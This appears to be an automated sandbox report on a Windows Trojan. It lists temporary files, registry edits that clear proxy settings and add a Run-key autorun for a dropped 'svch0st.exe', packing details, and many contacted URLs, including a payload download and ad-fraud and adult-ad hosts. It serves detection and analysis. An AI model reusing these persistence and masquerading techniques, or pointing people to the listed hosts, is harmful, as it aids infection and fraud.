C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906144842;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EY6YFA77.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5FM6I276.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[4].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1THAFJKQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[3].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\index[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJIU3XS6.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\c=n;dst=1;et=1484906153069;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[5].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[2].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\H49OIM3X.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\8A4F0C723F1C[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (0 bytes)

Registry activity

The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"EnableConsoleTracing" = "0"

"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5ce023bff60b4dbb7b7f0574f360735d_RASAPI32]
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process svch0st.exe:3196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\kimiss.net]
"(Default)" = "63"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\onlylady.com]
"(Default)" = "63"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91438"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process svch0st.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\CHtmlDialog\International]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\svch0st_RASMANCS]
"ConsoleTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GuaZhuan" = "C:\Windows\system32\svch0st.exe -autorun"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\iqiyi.com]
"(Default)" = "9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91282"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process svch0st.exe:2632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coinsns.com]
"(Default)" = "23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473662500"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "svch0st.exe"

[HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Total]
"(Default)" = "91375"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
6edfe80996b2416c3643b721283eaffb	c:\Windows\System32\svch0st.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.dywt.com.cn)
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	835584	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	839680	405504	401920	5.49657	3b03fbbee721c3061f8051e12edaa94f
.rsrc	1245184	12288	10240	2.95109	159dafcfa74215c605ccb8afdb287c26

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://update-10042197.cos.myqcloud.com/date/11.exe	101.226.211.139
hxxp://ap5.liuliangbao.cn/as/c/f8/	202.75.219.243
hxxp://ap5.liuliangbao.cn/as/2/h1/	202.75.219.243
hxxp://ap5.liuliangbao.cn/as/2/h3/	202.75.219.243
hxxp://ap5.liuliangbao.cn/redirect/CFGUpdate?number=6.5&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	202.75.219.243
hxxp://ap5.liuliangbao.cn/clt/jobid/4acb0cb2593b811134e592df6755ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0	202.75.219.243
hxxp://ap5.liuliangbao.cn/redirect/CFGUpdate?number=6.5&checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	202.75.219.243
hxxp://ap5.liuliangbao.cn/ts/f2.2/	202.75.219.243
hxxp://cltres3.liuliangbao.cn.w.kunlunar.com/clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924	116.207.117.87
hxxp://cltres3.liuliangbao.cn.w.kunlunar.com/clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501	116.207.117.87
hxxp://ap.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://ap5.liuliangbao.cn/as/2/h5/	202.75.219.243
hxxp://coolsitesur.cloudns.pro/bao-animalpornvideo-net.php	167.88.118.247
hxxp://zooxxxfree.com/
hxxp://gba.onlylady.com/ads6.php	106.3.135.108
hxxp://ap3.liuliangbao.cn/ts/f3.1/	61.153.104.59
hxxp://ap5.liuliangbao.cn/as/c/f11/	202.75.219.243
hxxp://hitslap.com/pupfurt.js	198.255.108.234
hxxp://pornvideo-box.com/trade	198.255.108.210
hxxp://vip0x055.ssl.rncdn5.com/js/marketplace.min.js
hxxp://steenbergen.web.ero-advertising.com/banads/view.php?spaceid=2168566
hxxp://e5233.a.akamaiedge.net/v_19rra3jt70.html?list=19rrkqccqe
hxxp://ads.trafficjunky.net/ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343911&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=56_1484906105906078_12799&uuid=48a9dec2-af58-42f3-8797-50cf1a156d48	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=50_1484906105921674_21386&uuid=ed52589f-2015-4c94-939d-10ca076c51c4	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1343921&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343931&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=29_1484906106070879_21559&uuid=003c6b87-acf8-41d3-a0d5-191629132b3d	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=54_1484906106090851_7210&uuid=32fa73d3-9003-473d-a39a-6a2fa13bac12	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1343941&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1343951&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1331611&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=52_1484906106135386_5191&uuid=9382141a-68b6-409b-8dfe-9704cf9ba99c	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=55_1484906106204537_27019&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344011&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1344021&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=53_1484906106291540_30079&uuid=f6d622d2-74ce-4b18-9176-428ec07c8fc1	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=27_1484906106350967_9603&uuid=f262600c-ccdc-4fa0-a68a-ebaa6afeceec	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344031&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=28_1484906106403577_17845&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=53_1484906106522410_29323&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads.trafficjunky.net/ads?zone_id=1344041&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads.trafficjunky.net/ads?zone_id=1344051&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106	31.192.125.232
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=54_1484906106583286_7218&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=56_1484906106582962_12796&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=52_1484906106682039_8221&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651284&impid=50_1484906106729452_21376&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15	94.199.252.216
hxxp://e5233.a.akamaiedge.net/js/player_v1/pcweb.wonder.js
hxxp://e5233.a.akamaiedge.net/js/player_v1/config/online.js
hxxp://n2.panthercdn.com/files/onlyladyomd_new2.php
hxxp://e5233.a.akamaiedge.net/js/lib/sea1.2.js
hxxp://e5233.a.akamaiedge.net/js/common/52ba69c7b1d54420bec46c52cec587c6.js
hxxp://ap.liuliangbao.cn/clt/config/GlobalConfig_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/1050f98c2359.swf
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=sunkuotest&tn=1484906108169&yhls=1573105147225&fuid=&juid=&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201&ver=&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1484906108170
hxxp://hm.e.shifen.com/hm.js?53b7374a63c37483e5dd97d78d9bb36e
hxxp://x.jd.com.gslb.qianxun.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback	106.39.169.66
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22346699
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22350506
hxxp://360.xdwscache.ourglb0.com/11.0.1.js?fa1c7fce79127597cbed202ea98aec2c
hxxp://hm.e.shifen.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&et=0&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=1570361624&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1&tt=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º
hxxp://ap.liuliangbao.cn/clt/config/cfg_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://d7m0tkf5tdvs9.cloudfront.net/static/ab77b6ea7f3fbf79.js
hxxp://atanx.alicdn.com.danuoyi.tbcache.com/t/tanxssp.js?_v=12	195.27.31.250
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/ugcBodanPlay_ver.js?3leiavi
hxxp://e5233.a.akamaiedge.net/js/pingback/qa.js
hxxp://e5233.a.akamaiedge.net/player/cupid/common/clear.swf?r=6yuxxr
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=piaoshhtestmayttf&des=find_Q_ready&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1238272289
hxxp://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat.zip?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://ap.liuliangbao.cn/clt/config/blhash_6.5.dat.zip
hxxp://a1294.w20.akamai.net/beacon.js
hxxp://share.n.shifen.com/push.js
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=piaoshhtestmayttf&job=ugcbodanplay&des=findpagebyjob&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&entry=Q.load&prj=qiyiV2&_=1776244267
hxxp://e5233.a.akamaiedge.net/js/pingback/iwt.js
hxxp://atanx.alicdn.com.danuoyi.tbcache.com/g/mm/tanx-cdn2/t/tanxssp.js?_v=12	195.27.31.250
hxxp://cs803.wac.systemcdn.net/jzt/libs/behavior/v2/behavior.js
hxxp://cs803.wac.systemcdn.net/jzt/temp/js/_J.1.2.min.js
hxxp://a1294.w20.akamai.net/b?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/20170119180153/common/common.js
hxxp://a1294.w20.akamai.net/b2?c1=2&c2=7290408&ns__t=1484906111082&ns_c=windows-1252&ns_if=1&cv=3.1&c8=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º&c7=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&c9=
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906109847
hxxp://s-b.360.cn/so/zz.gif?url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&sid=fa1c7fce79127597cbed202ea98aec2c&token=feaq1ccc7qfkcrer79911=2t7s5i9l7?
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=jingyitest1&url=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&ver=WIN 23,0,0,185&yhls=1485764902188&pla=11&mod=cn_s&tn=0.6147289201617241
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20161122/182321793893.swf
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=svrs&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=b7ec007eeb7742d5c4f169def66e0c67&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.11122033419087529
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/036300cf212b7b.swf
hxxp://e5233.a.akamaiedge.net/crossdomain.xml
hxxp://e5233.a.akamaiedge.net/ext/common/Tipdatavod_201610311735.xml?n=0.2173128924332559
hxxp://iqiyi.irs01.com/irt?_iwt_id=&_iwt_UA=UA-iqiyi-000001&jsonp=MTIY5MRC6L5L4AG3&_iwt_p1=&_iwt_p2=&_iwt_p3=&	106.38.178.170
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heAb1y8zHhESL05A9jqTN-_xcs6r_ygqa3471hOG2sKfIoo7D2VlowD6Maz-72y8SXfViIdJoaCoS_HPHWJSJDgiGrhcZWBxoUmZ9yyAUMmAo_4aO-ZoVQIQcqIq-yVmKRLtJco4qPxA4XtzpCIBjYyorLiBoLIAbbhd5F0JwLQyDI1lcJyYG-HWtHsKJeo7I1r0b8QXL_sw_iYZQsMnHbXby88qZA7AezNilyO5VjcFnX2hpHyuTKOGiqqeXNKCrRPxeulH-BdCgVIuHM5x2gT2GaRlDqGb8cKpM6du77WlaXoBegrJBDJ8tLBQr2k7TWUMtFrguvyHrXDYXGCSbDyvKIMa_aNdiw8xJyZcXWxfc9Gnr6sRGca4wBnDoeinYT&v=404&seq=1	106.39.169.66
